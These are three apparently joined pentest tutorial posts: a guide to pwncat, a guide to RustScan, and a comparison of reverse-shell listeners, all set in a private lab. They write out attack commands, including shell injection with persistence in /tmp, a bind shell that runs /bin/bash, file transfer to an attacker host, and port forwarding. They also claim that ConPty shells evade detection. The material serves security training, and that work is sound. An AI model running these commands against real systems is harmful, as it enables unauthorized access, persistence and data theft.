A Detailed Guide on Pwncat

 Pwncat stands out as an open-source Python tool highly regarded for its versatility, providing a contemporary alternative to the traditional netcat utility. Tailored for network exploration, exploitation, and penetration testing needs, it offers a modernized approach to these tasks. With an emphasis on user-friendly features and comprehensive functionality, pwncat facilitates seamless interactions with network services, aiding in reconnaissance and vulnerability assessment.

The official documentation for the usage of this tool can be checked from here: https://pwncat.org/

Table of Content

·      Lab Setup

·      Installation

·      Usage

o   Port Scanning and Banner grabbing

o   As a listener

o   Bind Shell (Linux)

o   Reverse Shell (Windows)

o   Local Port Forwarding

o   To Send/Receive files

·      Advantages over Netcat

·      Conclusion

Lab Setup

In this article, we are going to show the usage of pwncat on both linux and windows target machines as mentioned below:

Target Machines: Ubuntu (192.168.1.23), Windows (192.168.1.4)

Attacker Machine: Kali Linux (192.168.1.7)

 

Installation

Installation of pwncat can be done using pip or apt.

To install using apt use the following command:

apt install pwncat

To install using pip use the following command:

pip install pwncat

Usage

Port scanning and Banner grabbing

Pwncat can be used to perform both port scanning and banner grabbing on the open ports by stating the range of ports along with the --banner flag.

pwncat -z 192.168.1.23 1-100

pwncat -z 192.168.1.23 1-100 --banner

Pwncat not only performs port scanning on TCP ports it can also scan UDP ports just by using a -u flag in the above command.

As a Listener

When used as a listener pwncat holds a persistence by creating a file in the /tmp/ directory. Therefore, if a connection is lost the reverse shell can still be obtained at the same port which was previously used like a persistence.

pwncat -l 1234 --self-inject /bin/bash:192.168.1.7:1234

The persistence can be checked by running a rlwrap listener at the same port after terminating the above connection.

Pwncat has a feature to create persistence on multiple ports which can be performed using the following command:

pwncat -l 1234 --self-inject /bin/bash:192.168.1.7:1234+2

It can be observed that along with port 1234, the reverse shell can also be obtained on the ports 1235 and 1236.

Reverse Shell (Windows)

To get a reverse shell, command can be used from the reverse shell generator (https://www.revshells.com/)  in the Windows machine to get a reverse shell.

Before executing the command copied from the revshells.com, start a listener at port 4444 in the kali machine using the following command:

pwncat -l 4444

Local Port Forwarding

Perform the installation of pwncat inside the Ubuntu machine using the following command:

pip3 install pwncat

After a reverse shell is obtained using the usage discussed in the As a Listener section. It was observed that an application is running internally inside the Ubuntu machine at port 8080. Hence to access that web application inside our kali machine, we will perform Local Port forwarding using the following command:

pwncat -L 0.0.0.0:5000 127.0.0.1 8080

After the execution of the above command, the web application can now be accessed inside the kali machine at the URL: http://192.168.1.23:5000

Send and Receive Files

Besides the above discussed usage pwncat can also be used to send/receive files. It starts with the installation of pwncat in the ubuntu machine.

This includes creating a file in the Ubuntu system as data.txt file in the ubuntu machine and start a listener in the kali machine where the file is to be received.

To receive the file in the kali machine, the following command can be used:

pwncat -l 6666 > data.txt

 

After the listener is active the following command can be used to transfer the file in kali machine.

pwncat 192.168.1.7 6666 < data.txt

 

Bind Shell (Linux)

To get a bind shell start a listener inside the kali machine using the following command:

pwncat 192.168.1.23 9874

Inside the Ubuntu machine type the following command:

pwncat -l -e '/bin/bash ' 9874 -k

It can be observed that the bind shell connection is obtained on the kali machine. Because of -k flag used above the bind shell will re-accept new clients as soon as a client has disconnected.

It can be noted that the above procedure is also satisfied while working with the UDP ports just by using -u flag after the command.

Advantages over Netcat

Pwncat, a feature-rich netcat-like tool designed for pentesters and red teamers, offers several enhancements over traditional Netcat:

• Interactive Shell
• Scriptable Interface
• Encrypted Communication
• Persistance

 

Pwncat provides an interactive shell with syntax highlighting and command completion, improving the user experience. Pentesters can automate tasks using Pwncat’s Python scripting interface, allowing for greater flexibility and customization. It also supports encrypted communication channels, ensuring confidentiality when interacting with compromised systems.

Conclusion

In conclusion, we can say that pentesters/red teamers can use a lot of tools to get reverse shell/bind shell/ upload-download files/Local Port forwarding and many more. However, if pwncat is considered in regular practise it can prove to be a very valuable and time saving tool.

A Detailed Guide on RustScan

In the realm of cybersecurity, network scanning tools play a vital role in reconnaissance and vulnerability assessment. Among the array of options available, Rustscan has emerged as a formidable contender, offering speed, efficiency, and versatility that distinguish it from traditional tools like Nmap.

Table of Contents

·      What sets Rustscan apart?

·      Advantages of Rustscan over Nmap

·      Usage (Docker)

·      Installation and Usage (Standalone)

·      Rustscan flags

·      Conclusion

What sets Rustscan apart?

Rustscan is an open-source network scanner developed in the Rust programming language. Its lightweight design, optimized algorithms, and user-friendly interface make it a preferred choice for both penetration testers and security professionals.

Advantages of Rustscan over Nmap:

Speed: It is renowned for its rapid scanning capabilities. Its multithreaded architecture and optimized algorithms enable it to scan large networks significantly faster than traditional scanners like Nmap.

Efficiency: It prioritizes efficiency, utilizing resources intelligently and minimizing overhead. This ensures that scanning tasks are completed swiftly without excessive resource consumption.

Ease of Use: With its intuitive interface and simplified command structure, Rustscan is accessible to users of all levels of expertise. Its design minimizes the learning curve typically associated with network scanning tools.

Versatility: It offers a broad range of features and customization options, allowing users to tailor their scans to specific requirements. Whether performing basic port scanning or comprehensive service enumeration, Rustscan delivers.

 

Usage (Docker)

Rustscan can run by pulling an image using docker. The installation guide is available here https://github.com/RustScan/RustScan/wiki/Installation-Guide  

To install docker use the command:

apt install docker.io

After the docker installation, rustscan can run from the following command:

docker run -it --rm --name rustscan rustscan/rustscan:2.1.1 -a 192.168.1.7

Installation and Usage (Standalone)

Installation of Rustscan can be performed using cargo, the following command can be used:

apt install cargo

cargo install rustscan

 

Make sure to add the /root/.cargo/bin to the path

echo $SHELL

nano .zshrc

Add the /root/.cargo/bin as export PATH.

 

After installation success, Rustscan is now ready to run.

Rustscan flags

There are a number of operations which can be performed using Rustscan, below listed are the flags to perform respective operation in Rustscan.

-a : To perform a comprehensive scan of all TCP ports.

rustscan -a 192.168.1.7

 

--ulimit : To adjust the ulimit for file descriptors to handle large-scale scans. If the scan is running slow adding this flag with a value of 5000 will make it run faster.

rustscan -a 192.168.1.7 --ulimit 5000

-p : To define specific ports to be scanned.

rustscan -a 192.168.1.7 -p 21,22,23

-r : To perform a range scan, specific range of ports will be scanned.

rustscan -a 192.168.1.7 -r 21-50

 

 

 

-sC -sV : To perform default script scan and service version scan.

rustscan -a 192.168.1.7 -- -sC -sV

Results of service version and default script scan can be seen below.

Rustscan can also be used to scan the entire subnet IP addresses by just adding a /24 after the IP address.

rustscan -a 192.168.1.0/24

-g : To enable the "greppable" output format for easy parsing and analysis.

rustscan -a 192.168.1.7 -g

--accessible : Turn on accessible mode, does not print ASCII art. Also does not print very large blocks of text, as this can cause some pain with screenreaders. This reduces the information you get.

rustscan -a 192.168.1.7 --accessible

Conclusion

Rustscan represents a significant advancement in network scanning technology. Its speed, efficiency, and versatility make it an invaluable tool for cybersecurity professionals. Whether conducting routine network audits or hunting for vulnerabilities, Rustscan is a must-have in your toolkit.

Best Alternative of Netcat Listener

Pentesters rely on a variety of tools to establish connections and maintain access during security assessments. One critical component of their toolkit is the listener—a program that listens for incoming connections and facilitates communication with compromised systems.

 In this blog post, we'll delve into different listener options, exploring features and use cases for popular tools such as Netcat, Rlwrap, Rustcat, Pwncat and Windows ConPty shell.

Table of Content

·       Reverse Shell Generator

·       Netcat for Beginners

·       Rlwrap for OSCP

·       Rustcat for OSCP

·       Pwncat for Read Teamers

·       Windows ConPty for OSCP  & Red Teamers

Reverse Shell Generator

In order to generate a reverse shell the https://www.revshells.com/ can be used as it provides a number of commands for the reverse shells and listeners based on the OS that can be used ideally in Remote command Execution based Scenario

However there are my online and offline techniques can be used for Reverse Generator, read our previous blog “Easy way to Generate Reverse Shell”

 

Netcat

Netcat, often dubbed the "Swiss Army knife of networking," is a versatile tool for creating simple TCP and UDP connections. Its minimalist design and broad functionality make it a favorite among pentesters. Key features include:

·       Basic Connectivity

·       Port Scanning

·       File Transfer

·       Remote Shell Access

A netcat listerner is started at port 4444 in the kali machine. Following is the command for the netcat listener:

nc -lnvp 4444        

After generating the command from reverse shell generator, the command for reverse shell is used in the ubuntu OS.

After running the above command in the ubuntu OS, a reverse shell is obtained in the kali machine.

Limitation: However, it is observed that after pressing the upper arrow key to reuse the previous command the terminal does not completes the command.

rlwrap for OSCP

rlwrap, short for "readline wrapper" enhances the usability of command-line interfaces. While not a dedicated listener tool, it improves the experience of interacting with shell-based tools like Netcat through:

·       Command Line History

·       Autocompletion

Benefits of Rlwrap over Netcat

rlwrap adds command history and editing capabilities to Netcat sessions, simplifying command recall and modification. Pentesters benefit from rlwrap's tab-completion feature, speeding up command entry by suggesting possible completions based on the current input.

Installation of rlwrap is simple, just use the following command:

apt install rlwrap

After installation repeat the entire process followed in the netcat section, but for reverse shell use the following listener command to use the rlwrap:

rlwrap nc -lvnp 4444

Advantage: Observe that the after the reverse shell is obtained, the command can be autocompleted and reused.

 

Rustcat for OSCP

Rustcat, a modern reimplementation of Netcat in the Rust programming language, aims to provide improved performance and security while retaining Netcat's functionality. Key reasons for its adoption include:

·       Serves it purpose of listening to ports

·       Grab History

·       User-friendly

·       Supports udp

·       Uses colors

Rustcat leverages Rust's memory safety features, reducing the likelihood of common vulnerabilities such as buffer overflows. Its design enables concurrent connections, allowing pentesters to handle multiple sessions efficiently. Like Netcat, Rustcat is available on multiple platforms, ensuring compatibility across different operating systems.

Installation of Rustcat can be done using cargo, the following command can be used:

apt install cargo

cargo install rustcat

Make sure to add the /root/.cargo/bin to the path

echo $SHELL

nano .zshrc

Add the /root/.cargo/bin as Export Path.

After installation repeat the entire process followed in the netcat section, but for reverse shell use the following listener command to use the rustcat:

rcat listen -ib 1234

Advantage: Observe that the tab completion is enable in rcat and can be used to autocomplete the commands.

Observe that the tab completion is enable in rcat and can be used to autocomplete the commands.

However, it has more dynamic features such UDP  (-lpu) connection and History function (-lpH) 

Pwncat for Red Teamer

Pwncat, a feature-rich netcat-like tool designed for pentesters and red teamers, offers several enhancements over traditional Netcat:

·       Interactive Shell

·       Scriptable Interface

·       Encrypted Communication

·       Persistance

Pwncat provides an interactive shell with syntax highlighting and command completion, improving the user experience. Pentesters can automate tasks using Pwncat's Python scripting interface, allowing for greater flexibility and customization. It also supports encrypted communication channels, ensuring confidentiality when interacting with compromised systems.

Installation of pwncat can be done using pip, the following command can be used:

pip install pwncat

After installation repeat the entire process followed in the netcat section, but for reverse shell use the following listener command to use the pwncat:

pwncat -l 1234 --self-inject /bin/bash:192.168.1.7:1234

Advantage: Observe that pwncat holds a persistence by creating a file in the /tmp/ directory. Therefore, if a connection is lost the reverse shell can still be obtained at the same port which was previously used like a persistence

The persistence can be checked by running a rlwrap listener at the same port after terminating the above connection.

Pwncat has a feature to create persistence on multiple ports which can be performed using the following commands:

pwncat -l 1234 --self-inject /bin/bash:192.168.1.7:1234+2

 

It can be observed that along with port 1234, the reverse shell can also be obtained on the ports 1235 and 1236.

Windows ConPty Shell

The Windows ConPty shell, a more recent addition to the pentester's arsenal, leverages the ConPty functionality introduced in Windows 10. It offers several advantages over traditional shells:

·       Improved TTY

·       Stability and Compatibility

·       Evasion Techniques

ConPty shell provides improved TTY functionality, allowing for a more interactive experience, including proper handling of command line utilities like Vim and Python.

Advantage: It is more stable and compatible with modern Windows systems, providing a reliable option for post-exploitation activities. Pentesters can utilize ConPty shell to bypass security mechanisms by avoiding traditional detection methods.

Reverse shell generator can be used for the listener command and the reverse shell payload.

For starting the listener at port 443 in the kali machine the command can be used from the reverse shell generator website.

Now using the reverse shell payload in the windows machine and running the command copied from reverse shell generator.

Observe that the reverse shell is obtained at port 443 and it is a fully interactive session.

Conclusion

In conclusion, pentesters have a diverse range of listener options available, each offering unique features and benefits. Whether it's the simplicity of Netcat, the usability enhancements of Rlwrap, the performance and security of Rustcat, the advanced capabilities of Pwncat, or the modern functionality of the Windows ConPty shell, selecting the right tool depends on the specific requirements of the assessment.

By understanding the strengths and weaknesses of these tools, pentesters can effectively establish and maintain access during security engagements.